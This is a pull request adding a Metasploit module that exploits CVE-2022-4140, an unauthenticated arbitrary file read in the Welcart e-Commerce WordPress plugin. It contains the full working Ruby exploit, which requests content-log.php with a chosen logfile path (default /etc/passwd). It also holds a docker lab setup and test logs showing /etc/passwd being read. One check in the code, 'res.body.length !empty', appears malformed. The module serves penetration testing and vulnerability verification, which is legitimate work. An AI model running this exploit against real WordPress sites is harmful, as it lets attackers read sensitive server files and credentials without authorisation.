### PR TITLE
Add WordPress Welcart e-Commerce plugin unauthenticated arbitrary file read module (CVE-2022-4140)

### DIFF
--- a/documentation/modules/auxiliary/gather/wp_welcart_fileread_cve_2022_4140.md
+++ b/documentation/modules/auxiliary/gather/wp_welcart_fileread_cve_2022_4140.md
@@ -1,0 +1,129 @@
+## Vulnerable Application
+
+Welcart e-Commerce plugin of WordPress prior to 2.8.5, fails to validate user input supplied to content-log.php.
+This leads to an arbitrary file read vulnerability allowing unauthenticated attackers to retrieve sensitive files stored locally.
+
+This module uses this vulnerability to retrieve the contents of arbitrary files by abusing the logfile parameter of content-log.php.
+
+### Pre-requisites
+- **Docker** and **Docker compose** installed.
+
+## Setup
+
+1. **Create a home directory**
+```
+mkdir wordpress-docker
+cd wordpress-docker
+vim docker-compose.yml
+```
+2. **Create a docker-compose.yml file**
+```
+services:
+  db:
+    image: mysql:8.0
+    container_name: wordpress-db
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: rootpassword
+      MYSQL_DATABASE: wordpress
+      MYSQL_USER: bala
+      MYSQL_PASSWORD: password
+    volumes:
+      - db_data:/var/lib/mysql
+
+  wordpress:
+    image: wordpress:latest
+    container_name: wordpress
+    restart: unless-stopped
+    depends_on:
+      - db
+    ports:
+      - "8080:80"
+    environment:
+      WORDPRESS_DB_HOST: db:3306
+      WORDPRESS_DB_USER: bala
+      WORDPRESS_DB_PASSWORD: password
+      WORDPRESS_DB_NAME: wordpress
+    volumes:
+      - wordpress_data:/var/www/html
+
+volumes:
+  db_data:
+  wordpress_data:
+```
+3. **Start the container**
+```
+sudo docker-compose up -d
+```
+4. **Download the vulnerable plugin and copy to relevant folder**
+```
+svn checkout https://plugins.svn.wordpress.org/usc-e-shop/tags/2.8.4/
+mv 2.8.4 usc-e-shop
+sudo docker cp usc-e-shop wordpress:/var/www/html/wp-content/plugins/
+```
+5. **Complete WordPress Installation**
+- Navigate to http://localhost:8080 and select English when asked for the language.
+- Enter a site title, username, password and email address.
+6. **Activate the plugin**
+- Log into admin dashboard at http://localhost:8080/wp-login.php by entering the username and password configured in the previous step.
+- On the left hand menu, select Plugins-\> Installed Plugins
+- Locate the Welcart e-Commerce plugin and click on Activate.
+
+## Verification Steps
+1. **Launch Metasploit**
+```
+msfconsole
+```
+2. **Load the Welcart file read scanner**
+```
+use auxiliary/gather/wp_welcart_fileread_cve_2022_4140
+set RHOSTS 127.0.0.1
+set RPORT 8080
+set TARGETURI /
+```
+3. **Run the module**
+```
+run
+```
+4. **Observe output**
+
+The module should:
+- Check if the target is alive and has installed WordPress
+- Check the plugin version and identify if it is vulnerable
+- Retrieve the file and save it locally
+
+## Options
+
+- **TARGETURI**(`/`): Base path to WordPress installation
+- **FILEPATH**(`/etc/passwd`): Path of file to download
+
+## Scenarios
+```
+msf auxiliary(gather/wp_welcart_fileread_cve_2022_4140) > run
+[*] Running module against 127.0.0.1
+[+] Welcart e-Commerce plugin found: {:version=>"2.8.4"}
+[+] The target is vulnerable
+[*] File saved to: /home/kali/.msf4/loot/20260908071206_default_127.0.0.1_welcart.http_325933.bin
+[*] Auxiliary module execution completed
+msf auxiliary(gather/wp_welcart_fileread_cve_2022_4140) > cat /home/kali/.msf4/loot/20260908071206_default_127.0.0.1_welcart.http_325933.bin
+[*] exec: cat /home/kali/.msf4/loot/20260908071206_default_127.0.0.1_welcart.http_325933.bin
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+```

--- a/modules/auxiliary/gather/wp_welcart_fileread_cve_2022_4140.rb
+++ b/modules/auxiliary/gather/wp_welcart_fileread_cve_2022_4140.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Welcart e-Commerce Arbitrary File Read (CVE-2022-4140)',
+        'Description' => %q{
+          This module exploits an arbitrary file read vulnerability in Wordpress's Welcart e-Commerce plugin versions prior to 2.8.5.
+          The plugin's content-log.php file does not validate user input before using it to output the content of logfiles.
+          This allows unauthenticated attackers to access the vulnerable endpoint directly and read arbitrary files on the server.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sinn3r', # Used sinn3r's yaws_traversal exploit module as a skeleton
+          'Balachandar Gowrisankar'
+        ],
+        'References' => [
+          ['CVE', '2022-4140']
+        ],
+        'DisclosureDate' => '2022-12-05',
+        'Notes' => {
+          'Reliability' => [REPEATABLE_SESSION],
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('FILEPATH', [false, 'The name of the file to download', '/etc/passwd']),
+        OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/'])
+      ]
+    )
+  end
+
+  def run
+    # Check whether server is reachable and WordPress is installed
+    unless wordpress_and_online?
+      print_error('Server not online or not detected as WordPress')
+      return
+    end
+
+    # Check if filename is specified
+    if datastore['FILEPATH'].nil? || datastore['FILEPATH'].empty?
+      print_error('Please supply the name of the file you want to download')
+      return
+    end
+
+    # Check if plugin version is vulnerable
+    version = check_plugin_version_from_readme('usc-e-shop', '2.8.5')
+
+    if version == Msf::Exploit::CheckCode::Unknown
+      print_status('No response for plugin\'s readme.txt or it could not be found')
+      return
+    elsif version == Msf::Exploit::CheckCode::Detected
+      print_status(version.message)
+      return
+    elsif version == Msf::Exploit::CheckCode::Safe
+      print_good("Welcart e-Commerce plugin found: #{version.details}")
+      print_error('The target is not vulnerable')
+      return
+    elsif version == Msf::Exploit::CheckCode::Appears
+      print_good("Welcart e-Commerce plugin found: #{version.details}")
+      print_good('The target is vulnerable')
+    end
+
+    # Create request
+    route = normalize_uri(
+      datastore['TARGETURI'],
+      'wp-content',
+      'plugins',
+      'usc-e-shop',
+      'functions',
+      'content-log.php'
+    )
+    route += "?logfile=#{datastore['FILEPATH']}"
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri' => route
+    })
+
+    unless res.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected HTTP status: #{res.code} while attempting to read file")
+    end
+    unless res.body.length !empty
+      fail_with(Failure::Unreachable, 'File does not exist')
+    end
+
+    fname = File.basename(datastore['FILEPATH'])
+
+    path = store_loot(
+      'welcart.http',
+      'application/octet-stream',
+      datastore['RHOST'],
+      res.body,
+      fname
+    )
+    print_status("File saved to: #{path}")
+  end
+end


### PR DESCRIPTION
## Description

This module exploits [CVE-2022-4140](https://nvd.nist.gov/vuln/detail/cve-2022-4140), an arbitrary file read vulnerability in WordPress's Welcart e-Commerce plugin(versions < 2.8.5). The plugin's content-log.php file does not validate user input before using it to output the content of logfiles. This allows unauthenticated attackers to retrieve any arbitrary file contents from the target by abusing the logfile parameter of content-log.php.

## Breaking Changes

None

## Verification Steps

1. Set up WordPress with Welcart e-Commerce < 2.8.5(a `docker-compose.yml` is given in the module documentation)
2. Start `msfconsole` and type `use auxiliary/gather/wp_welcart_fileread_cve_2022_4140`
3. Set target IP, target port and target URI with `set RHOSTS`, `set RPORT` and `set TARGETURI`
4. Execute `run`. It should identify that the plugin version is vulnerable and save the contents of the arbitrary file locally

## Test Evidence

The module was tested with Wordpress 7.1(docker image) and Welcart e-Commerce plugin 2.8.4 and 2.8.5. For version 2.8.4, the module correctly identified the version as vulnerable and locally saved the contents of target's /etc/passwd file. For version 2.8.5, the module correctly identified the version as not vulnerable.

Welcart e-Commerce plugin 2.8.4
```
msf auxiliary(gather/wp_welcart_fileread_cve_2022_4140) > run
[*] Running module against 127.0.0.1
[+] Welcart e-Commerce plugin found: {:version=>"2.8.4"}
[+] The target is vulnerable
[*] File saved to: /home/kali/.msf4/loot/20260908071206_default_127.0.0.1_welcart.http_325933.bin
[*] Auxiliary module execution completed
msf auxiliary(gather/wp_welcart_fileread_cve_2022_4140) > cat /home/kali/.msf4/loot/20260908071206_default_127.0.0.1_welcart.http_325933.bin
[*] exec: cat /home/kali/.msf4/loot/20260908071206_default_127.0.0.1_welcart.http_325933.bin

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
```
Welcart e-Commerce plugin 2.8.5
```
msf auxiliary(gather/wp_welcart_fileread_cve_2022_4140) > run
[*] Running module against 127.0.0.1
[+] Welcart e-Commerce plugin found: {:version=>"2.8.5"}
[-] The target is not vulnerable
[*] Auxiliary module execution completed
```
## Environment

| Field | Details |
|-------|---------|
| **Operating System** | Kali Linux |
| **Target Software/Hardware** | WordPress 7.1 |
| **Docker Image / Vagrant Setup** | WordPress 7.1 + MySQL 8.0 compose file in module documentation |

## AI Usage Disclosure

ChatGPT was used to help with docker-compose.yml for docker setup of the environment.

## Pre-Submission Checklist

- [x] Included a corresponding documentation markdown file in `documentation/modules` _(new modules only)_
- [x] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
- [x] Tested on the target environment specified in the Environment section above
- [x] Read the [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and [module acceptance guidelines](https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)

